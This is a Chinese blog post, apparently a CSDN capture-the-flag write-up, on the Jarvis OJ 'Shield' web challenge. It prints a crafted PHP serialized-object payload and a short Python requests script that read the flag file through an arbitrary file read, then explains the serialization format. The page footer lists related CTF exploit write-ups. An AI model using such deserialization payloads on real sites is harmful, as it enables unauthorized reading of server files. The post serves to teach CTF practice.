jarvis oj 中的反序列化

最新推荐文章于 2021-12-09 20:27:05 发布
最新推荐文章于 2021-12-09 20:27:05 发布
阅读量211 收藏
点赞数
分类专栏: web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41079177/article/details/102724756
版权

jarvis oj 中的反序列化

收集信息:

image.png
发现是张图片,如果没有表明是个misc题目的话,这张图片显然是base64文件流读出来的,新标签看一下:
image.png         显然,这是个bsae64文件读出来的,上面 "img ="给我我们提示,显然是个任意文件读,那么我们把它所有必要文件都读出来: index.php shield.php    showimg.php
index.php:
image.png


shield.php:
image.png
showimg:
image.png
仔细观察,showimg除了用来读出他们其他没啥作用,至于过滤都是为了防护恶意破坏。可以看到本题是个反序列化的问题;

payload构造

最近在锻炼用python来写payload,所以本题也就用python写个payload,其实直接输入:

payload:    class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";} 即可

http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}
然后查看源码就可以了:
image.png
这里python payload这么写:

import requests
import re
payload = "/?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}"
p = requests.get('http://web.jarvisoj.com:32768/index.php'+payload)
t = p.text
flag = re.findall('Flag.+',t)
print(flag)

image.png

题目重点在于反序列化的使用:

一个对象中的序列化传入:
O:6:“Shield”:1:{s:4:“file”;s:8:“pctf.php”;}
1.O:对象,都写入O意为 Object
2.每个类型传入或者数字之后都要加上" : "
3.第二个是对象名的字符个数:6
4.下一个是对象名:Shield
5.下个是传入的变量个数:1
6.写变量时为了区分要加上:{}
7.第一个是变量名的类型:S 意为"String"
8.接着是变量名长度:4
9.变量名:"file"
10.之后就重复变量名这一套写入变量值。

神林丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JarvisOJ.docx
03-10
本文总结了 JarvisOJ Web 的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ Web ,我们学习到了如何...
jarvis oj 神盾局的秘密 wp
欢迎来到神林的博客
09-12 378
jarvis oj 序列 收集信息: 发现是张图片,如果没有表明是个misc题目的话,这张图片显然是base64文件流读出来的,新标签看一下:         显然,这是个bsae64文件读出来的,上面 "img ="给我我们提示,显然是个任意文件读,那么我们把它所有必要文件都读出来: index.php shield.php ...
jarvisoj的pwnlevel系列wp
Huiuyao的博客
12-09 2794
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其会有rank与题目数,其的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
jarvisoj-web-wp
Iambangbang的博客
08-21 3540
Port51 这是一道pctf的原题,,显然要用公网ip端口进行访问,这时候用到了curl命令,使用curl –local-port http://web.jarvisoj.com:32770/就可以得到flag,但是貌似服务器出了点儿问题,所以不弹flag了 LOCALHOST ,这个题目和上面一道题目差不多,都很基础,用火狐的代理,直接就可以了, Login ,一开始进去没什么思
jarvis oj(web wp)
Xi4or0uji
08-19 6862
api调用 这题是slim架构的xxe漏洞,看博客做题2333 https://www.leavesongs.com/PENETRATION/slim3-xxe.html simple injection username和password是注入点,然后就是确认怎么注入了 题目是过滤了空格的,但是可以用/**/绕过 确认存在admin表 username=admin'/**/...
Jarvis OJ 逆向工程部分WP
qq_42192672的博客
09-08 713
RE 1. androideasy 这题我做了一个比较详细(呆)的wp,给个链接:https://blog.csdn.net/qq_42192672/article/details/82528782 2. DD - Android Easy 怎么编译成JAVA代码的过程第一题已经给出了,就不多做赘述了 分析一下,首先定义一个arryOfByte1数组,每个元素是p数组与q数组每个元...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvisJarvis家庭自动
02-05
Jarvis家庭自动 注意:经过3年的断,我终于可以升级Jarvis,使其可以与新版本的Home Assistant一起使用。 我可能要花点时间才能使所有功能正常工作,但我会尽一切努力保持更新。 Jarvis是一个家庭助理( )...
jarvis:贾维斯家庭自动
05-01
贾维斯家庭自动 语音控制的家庭自动系统,以及用于做酷事的插件。 它有两个可用的侦听器: SNOWBOY它使用令人惊叹的snowboy产品( )等待关键字,然后根据...目前,它支持两个后端系统:WATSON和WIT(进行)。
jarvis oj level4 wp
pppp974的博客
07-18 366
先简单看一下代码 很容易发现这是一个栈溢出,此题考虑使用DynELF来获取system函数的位置,然后使用read将’bin/sh’写入bss段之,最后通过栈溢出进行调用。exp如下。 #!/usr/bin/env python from pwn import * elf = ELF('./level4') plt_write = elf.symbols['write'] plt_read...
Jarvis OJ PHPINFO【审计代码序列
Sp4rkW的博客
11-02 3929
原题地址:http://web.jarvisoj.com:32784/ 其实这题一开始是没有任何思路的,感觉不存在任何数据传输接收点,后来看到了一篇wp,点这里 感觉瞬间打开了新世界,,,这里写篇write up记录下做题过程 首先打开题目页面直接获得源码: <?php //A webshell is wait for you ini_set('session.s...
Jarvis OJ 神盾局的秘密
沐目的博客
04-19 614
Jarvis OJ 神盾局的秘密 首先打开网页后,发现一张图片,下载下来看了一下,没有什么发现。让后回到刚才的网页,打开控制器,发现图片是以文件包含的形式传过来的,所以就可以联想,它既然可以包含图片,那应该也就可以包含文件。于是我们需要在url里面试,我们目前就只知道有一个叫showimg.php的文件,所以我们就从它开始试。base64转码后,提交到url, 让后成功访问了,打开页面原代码,看见...
Jarvis OJ web部分_神盾局的秘密
silence1_的博客
07-18 492
Jarvis OJ web部分_神盾局的秘密 题目链接:http://web.jarvisoj.com:32768/ 打开题目,F12,发现一个图片链接,showimg.php?img=c2hpZWxkLmpwZw== 于是去到这个页面,发现并不是一张图片,而是图片的文档打开形式。又注意到img=c2hpZWxkLmpwZw==这个应该是base64编码后的字符串,解码后为shield.jpg。...
浙大CTF web-神盾局的秘密
weixin_46578840的博客
09-13 394
打开题目地址,看到一张图片f12看到img后跟了一串base 解码得到shield.jpg,将后缀改为php编码成base访问得到一串代码 得到flag所在的pctf.php,直接访问出错,看到url里的showimg.php文件,想到将其编码base64,看一下源代码,发现img参数可以任意查看文件 上面提示的shield,已经看过了,这时候想到phpo的web一般都会有index.php,编码base64访问一下 看到包含了shield.php文件,那思路就来了,可以用index文件class传参p
jarvisoj-web的一道SESSION序列题目
Firebasky的博客
08-14 482
哈哈哈,现学现卖。刚刚总结了session序列漏洞。现在就来做一下这个题目 还是参考师傅博客。 题目地址 <?php //A webshell is wait for you ini_set('session.serialize_handler', 'php'); session_start(); class OowoO { public $mdzz; function __construct() { $this->mdzz = 'phpinfo().
神盾局的秘密
筱阳的博客
12-21 326
题目地址 :http://web.jarvisoj.com:32768/       一般套路,先看HTTP头,源码   通过扫网站发现存在index.pnp 访问也没有什么东西 尝试:http://web.jarvisoj.com:32768/showimg.php?img=index.php    将index.php进行base64试试: view-source:htt...
171130 逆向-JarvisOJ(Fibonacci)
whklhhhh的博客
11-30 1116
1625-5 王子昂 总结《2017年11月30日》 【连续第426天总结】 A. JarvisOJ-Re-Fibonacci B. 首先运行,提示 来让我们玩一个数列游戏: a[0]=0,a[1]=1 a[2]=1,a[3]=2 a[4]=3,a[5]=5 ………….. 请计算a[100000000000000]: 刚开始还以为是通过什么算法做出来,准备
Jarvis-神盾局的秘密
wyj_1216 House
10-06 1197
神盾局的秘密 时间:2018年10月5日 回报人:王祎洁 题目 http://web.jarvisoj.com:32768/ 题解 打开网页,发现一张图片,查看页面源代码,发现图片是从showing.php读取的,且img=base64编码 并将其读入 发现是图片编码 尝试读取已知showing.php文件 尝试读取index.php文件 查看页面源代码后,发现shi...
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值